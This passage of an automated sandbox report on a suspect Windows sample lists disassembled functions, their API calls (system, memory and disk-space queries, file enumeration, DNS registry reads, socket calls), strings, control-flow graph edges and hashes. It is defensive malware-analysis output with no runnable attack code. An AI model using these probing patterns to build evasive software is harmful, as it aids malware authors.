                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                  • API String ID: 0-1590685507
                                  • Opcode ID: 59047042f470541f27575e51102465c8b4c3fce6f730bc4291ddef4dcc177d12
                                  • Instruction ID: be98b88b88469fbc1ec481df376f5b79fbaa0b4fb359319031c2549144385931
                                  • Opcode Fuzzy Hash: 59047042f470541f27575e51102465c8b4c3fce6f730bc4291ddef4dcc177d12
                                  • Instruction Fuzzy Hash: 89C2AF31A043449FD714CF29C484B6BB7E1BF84314F05866EEC989B352E779E989CB86
                                  Function 0042255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetSystemInfo.KERNELBASE ref: 00422579
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 004225CC
                                  • GetDriveTypeA.KERNELBASE ref: 00422647
                                  • GetDiskFreeSpaceExA.KERNELBASE ref: 0042267E
                                  • KiUserCallbackDispatcher.NTDLL ref: 004227E2
                                  • FindFirstFileW.KERNELBASE ref: 004228F8
                                  • FindNextFileW.KERNELBASE ref: 0042291F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                  • String ID: ;%B$@$`
                                  • API String ID: 3271271169-2679738426
                                  • Opcode ID: 0c03a5eaee02a1d5ce8a78bfa2df16638f3f29f9c1c0e3ce2a7f4b508d1317cb
                                  • Instruction ID: 3569c8e5879077cbf46e4855bf1dba82cb7f0fc8c169cfa48665cb2526472b52
                                  • Opcode Fuzzy Hash: 0c03a5eaee02a1d5ce8a78bfa2df16638f3f29f9c1c0e3ce2a7f4b508d1317cb
                                  • Instruction Fuzzy Hash: F4D1A0B49083199FCB10EF68D58569EBBF0FF88304F40896AE498D7350E7749A94CF92
                                  Function 004229FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1265 4229ff-422a2f FindFirstFileA 1266 422a31-422a36 1265->1266 1267 422a38 1265->1267 1268 422a3d-422a91 call 8d6790 call 8d6820 RegOpenKeyExA 1266->1268 1267->1268 1273 422a93-422a98 1268->1273 1274 422a9a 1268->1274 1275 422a9f-422b0c call 8d6790 call 8d6820 CharUpperA call 7a8da0 1273->1275 1274->1275 1283 422b15 1275->1283 1284 422b0e-422b13 1275->1284 1285 422b1a-422b92 call 8d6790 call 8d6820 call 7a8e80 call 7a8e70 1283->1285 1284->1285 1294 422b94-422ba3 1285->1294 1295 422bcc-422c66 QueryFullProcessImageNameA CloseHandle call 7a8da0 1285->1295 1298 422bb0-422bca call 7a8e68 1294->1298 1299 422ba5-422bae 1294->1299 1305 422c68-422c6d 1295->1305 1306 422c6f 1295->1306 1298->1294 1298->1295 1299->1295 1307 422c74-422ce9 call 8d6790 call 8d6820 call 7a8e80 call 7a8e70 1305->1307 1306->1307 1316 422dcf-422e1c call 8d6790 call 8d6820 CloseHandle 1307->1316 1317 422cef-422d49 call 7a8bb0 call 7a8da0 1307->1317 1327 422e23-422e2e 1316->1327 1328 422d4b-422d63 call 7a8da0 1317->1328 1329 422d99-422dad 1317->1329 1330 422e30-422e35 1327->1330 1331 422e37 1327->1331 1328->1329 1338 422d65-422d7d call 7a8da0 1328->1338 1329->1316 1332 422e3c-422ed6 call 8d6790 call 8d6820 1330->1332 1331->1332 1347 422eea 1332->1347 1348 422ed8-422ee1 1332->1348 1338->1329 1343 422d7f-422d97 call 7a8da0 1338->1343 1343->1329 1349 422daf-422dc9 call 7a8e68 1343->1349 1351 422eef-422f16 call 8d6790 call 8d6820 1347->1351 1348->1347 1350 422ee3-422ee8 1348->1350 1349->1316 1349->1317 1350->1351
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                  • String ID: 0
                                  • API String ID: 2406880114-4108050209
                                  • Opcode ID: be248d46e8daeb617e78a19a12e76379bedfec0ccc9a0e82ffc9aa392917f8a8
                                  • Instruction ID: 373cb41c4508292d2b4749a3cea0061569cc5914a2cef1bf75bd93a32f235e2c
                                  • Opcode Fuzzy Hash: be248d46e8daeb617e78a19a12e76379bedfec0ccc9a0e82ffc9aa392917f8a8
                                  • Instruction Fuzzy Hash: 1FE1B5B49083199FDB50EF68DA857AEBBF4AF45304F40896AE488D7350EB789944CF42
                                  Function 004305B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1505 4305b0-4305b7 1506 4307ee 1505->1506 1507 4305bd-4305d4 1505->1507 1508 4307e7-4307ed 1507->1508 1509 4305da-4305e6 1507->1509 1508->1506 1509->1508 1510 4305ec-4305f0 1509->1510 1511 4307c7-4307cc 1510->1511 1512 4305f6-430620 call 437350 call 4270b0 1510->1512 1511->1508 1517 430622-430624 1512->1517 1518 43066a-43068c call 45dec0 1512->1518 1519 430630-430655 call 4270d0 call 4303c0 call 437450 1517->1519 1524 430692-4306a0 1518->1524 1525 4307d6-4307e3 call 437380 1518->1525 1545 43065b-430668 call 4270e0 1519->1545 1546 4307ce 1519->1546 1528 4306a2-4306a4 1524->1528 1529 4306f4-4306f6 1524->1529 1525->1508 1534 4306b0-4306e4 call 4373b0 1528->1534 1531 4307ef-43082b call 433000 1529->1531 1532 4306fc-4306fe 1529->1532 1549 430831-430837 1531->1549 1550 430a2f-430a35 1531->1550 1537 43072c-430754 1532->1537 1534->1525 1544 4306ea-4306ee 1534->1544 1541 430756-43075b 1537->1541 1542 43075f-43078b 1537->1542 1547 430707-430719 WSAEventSelect 1541->1547 1548 43075d 1541->1548 1560 430791-430796 1542->1560 1561 430700-430703 1542->1561 1544->1534 1551 4306f0 1544->1551 1545->1518 1545->1519 1546->1525 1547->1525 1555 43071f 1547->1555 1556 430723-430726 1548->1556 1558 430861-43087e 1549->1558 1559 430839-430842 call 436fa0 1549->1559 1552 430a37-430a3a 1550->1552 1553 430a3c-430a52 1550->1553 1551->1529 1552->1553 1553->1525 1563 430a58-430a81 call 432f10 1553->1563 1555->1556 1556->1531 1556->1537 1572 430882-43088d 1558->1572 1566 430847-43084c 1559->1566 1560->1561 1565 43079c-4307c2 call 4276a0 1560->1565 1561->1547 1563->1525 1578 430a87-430a97 call 436df0 1563->1578 1565->1561 1570 430852 1566->1570 1571 430a9c-430aa4 1566->1571 1570->1558 1575 430854-43085f 1570->1575 1571->1525 1576 430893-4308b1 1572->1576 1577 430970-430975 1572->1577 1575->1572 1581 4308c8-4308f7 1576->1581 1579 43097b-430989 call 4270b0 1577->1579 1580 430a19-430a2c 1577->1580 1578->1525 1579->1580 1588 43098f-43099e 1579->1588 1580->1550 1589 4308f9-4308fb 1581->1589 1590 4308fd-430925 1581->1590 1591 4309b0-4309c1 call 4270d0 1588->1591 1592 430928-43093f 1589->1592 1590->1592 1598 4309c3-4309c7 1591->1598 1599 4309a0-4309ae call 4270e0 1591->1599 1596 4308b3-4308c2 1592->1596 1597 430945-43096b 1592->1597 1596->1577 1596->1581 1597->1596 1601 4309e8-430a03 WSAEnumNetworkEvents 1598->1601 1599->1580 1599->1591 1602 4309d0-4309e6 WSAEventSelect 1601->1602 1603 430a05-430a17 1601->1603 1602->1599 1602->1601 1603->1602
                                  APIs
                                  • WSAEventSelect.WS2_32(?,?,?), ref: 00430711
                                  • WSAEventSelect.WS2_32(?,?,00000000), ref: 004309DC
                                  • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004309FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: EventSelect$EnumEventsNetwork
                                  • String ID: N=B$multi.c
                                  • API String ID: 2170980988-1850152977
                                  • Opcode ID: 2ae93238eec5ee9bc739ed452359dbcafdf250a0c080837d848b780b4a2b997c
                                  • Instruction ID: 91f2f837a60c9dd6b36f273eef6110eec68a26141dcdcc64d623c68dbcd3e99d
                                  • Opcode Fuzzy Hash: 2ae93238eec5ee9bc739ed452359dbcafdf250a0c080837d848b780b4a2b997c
                                  • Instruction Fuzzy Hash: 39D1F5716083019FE710DF64D891BABB7E5FF98348F04592EF88487241E778E949CB5A
                                  Function 004EB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1676 4eb180-4eb195 1677 4eb19b-4eb1a2 1676->1677 1678 4eb3e0-4eb3e7 1676->1678 1679 4eb1b0-4eb1b9 1677->1679 1679->1679 1680 4eb1bb-4eb1bd 1679->1680 1680->1678 1681 4eb1c3-4eb1d0 1680->1681 1683 4eb3db 1681->1683 1684 4eb1d6-4eb1f2 1681->1684 1683->1678 1685 4eb229-4eb22d 1684->1685 1686 4eb3e8-4eb417 1685->1686 1687 4eb233-4eb246 1685->1687 1695 4eb41d-4eb429 1686->1695 1696 4eb582-4eb589 1686->1696 1688 4eb248-4eb24b 1687->1688 1689 4eb260-4eb264 1687->1689 1690 4eb24d-4eb256 1688->1690 1691 4eb215-4eb223 1688->1691 1693 4eb269-4eb286 call 4eaf30 1689->1693 1690->1693 1691->1685 1694 4eb315-4eb33c call 7a8b00 1691->1694 1704 4eb288-4eb2a3 call 4eb060 1693->1704 1705 4eb2f0-4eb301 1693->1705 1708 4eb3bf-4eb3ca 1694->1708 1709 4eb342-4eb347 1694->1709 1699 4eb42b-4eb433 call 4eb590 1695->1699 1700 4eb435-4eb44c call 4eb590 1695->1700 1699->1700 1712 4eb44e-4eb456 call 4eb590 1700->1712 1713 4eb458-4eb471 call 4eb590 1700->1713 1719 4eb2a9-4eb2c7 getsockname call 4eb020 1704->1719 1720 4eb200-4eb213 call 4eb020 1704->1720 1705->1691 1723 4eb307-4eb310 1705->1723 1714 4eb3cc-4eb3d9 1708->1714 1716 4eb349-4eb358 1709->1716 1717 4eb384-4eb38f 1709->1717 1712->1713 1734 4eb48c-4eb4a7 1713->1734 1735 4eb473-4eb487 1713->1735 1714->1678 1724 4eb360-4eb382 1716->1724 1717->1708 1725 4eb391-4eb3a5 1717->1725 1732 4eb2cc-4eb2dd 1719->1732 1720->1691 1723->1714 1724->1717 1724->1724 1726 4eb3b0-4eb3bd 1725->1726 1726->1708 1726->1726 1732->1691 1736 4eb2e3 1732->1736 1737 4eb4a9-4eb4b1 call 4eb660 1734->1737 1738 4eb4b3-4eb4cb call 4eb660 1734->1738 1735->1696 1736->1723 1737->1738 1743 4eb4cd-4eb4d5 call 4eb660 1738->1743 1744 4eb4d9-4eb4f5 call 4eb660 1738->1744 1743->1744 1749 4eb50d-4eb52b call 4eb770 * 2 1744->1749 1750 4eb4f7-4eb50b 1744->1750 1749->1696 1755 4eb52d-4eb531 1749->1755 1750->1696 1756 4eb533-4eb53b 1755->1756 1757 4eb580 1755->1757 1758 4eb53d-4eb547 1756->1758 1759 4eb578-4eb57e 1756->1759 1757->1696 1758->1759 1760 4eb549-4eb54d 1758->1760 1759->1696 1760->1759 1761 4eb54f-4eb558 1760->1761 1761->1759 1762 4eb55a-4eb576 call 4eb870 * 2 1761->1762 1762->1696 1762->1759
                                  APIs
                                  • getsockname.WS2_32(-00000020,-00000020,?), ref: 004EB2B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: ares__sortaddrinfo.c$cur != NULL
                                  • API String ID: 3358416759-2430778319
                                  • Opcode ID: 5dd79e2d3cc95a9130d4e1b2db135389a57adb5efd95225aca0f80b6e2b02cab
                                  • Instruction ID: f9ea460ff0e21b2d391d725e072022455568bf023f15b15e062a5e2035f9d2bc
                                  • Opcode Fuzzy Hash: 5dd79e2d3cc95a9130d4e1b2db135389a57adb5efd95225aca0f80b6e2b02cab
                                  • Instruction Fuzzy Hash: AFC18F316043559FD718DF26C885A6B77E1EF88305F04896EE8858B3A2D738ED45CBC5
                                  Function 00436FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 90200569156a243e462dd8f670625f4552035fd383f312262a90a240fdbc0d95
                                  • Instruction ID: ee41691a7e8630e367b915c40d28fb0642c8a675d79caa44c2ae87bd02e83f5a
                                  • Opcode Fuzzy Hash: 90200569156a243e462dd8f670625f4552035fd383f312262a90a240fdbc0d95
                                  • Instruction Fuzzy Hash: AC9137B160C3094BD7358A28C8D47BB72E5EFC8320F14AB2EE8D9432D4EB799C41D685
                                  Function 004EA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                  Download Yara Rule
                                  APIs
                                  • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,004D712E,?,?,?,00001001,00000000), ref: 004EA90C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: recvfrom
                                  • String ID:
                                  • API String ID: 846543921-0
                                  • Opcode ID: 32dea1ef7e7b892be39a2aabb4ec63e4c527bdfc808608ddd749a9953baeaf00
                                  • Instruction ID: 3596254f4c42d5b010b4949c9c0c88f1e03226689fca30e98e0157bcf3b9e7e8
                                  • Opcode Fuzzy Hash: 32dea1ef7e7b892be39a2aabb4ec63e4c527bdfc808608ddd749a9953baeaf00
                                  • Instruction Fuzzy Hash: B8F01DB5109348AFD2209E42DC88D6BBBEDEFC9754F05496DF958233119271AE11CAB2
                                  Function 004DA440 Relevance: 50.1, APIs: 20, Strings: 8, Instructions: 1066registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 004DA499
                                  • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 004DA4FB
                                  • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 004DA531
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004DAA19
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004DAA4C
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 004DAA97
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004DAAE9
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004DAB30
                                  • RegCloseKey.KERNELBASE(?), ref: 004DAB6A
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 004DAB82
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 004DAC46
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 004DAD0A
                                  • RegEnumKeyExA.KERNELBASE ref: 004DAD8D
                                  • RegCloseKey.KERNELBASE(?), ref: 004DADD9
                                  • RegEnumKeyExA.KERNELBASE ref: 004DAE08
                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 004DAE2A
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004DAE54
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004DAF63
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004DAFB2
                                  • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 004DB072
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
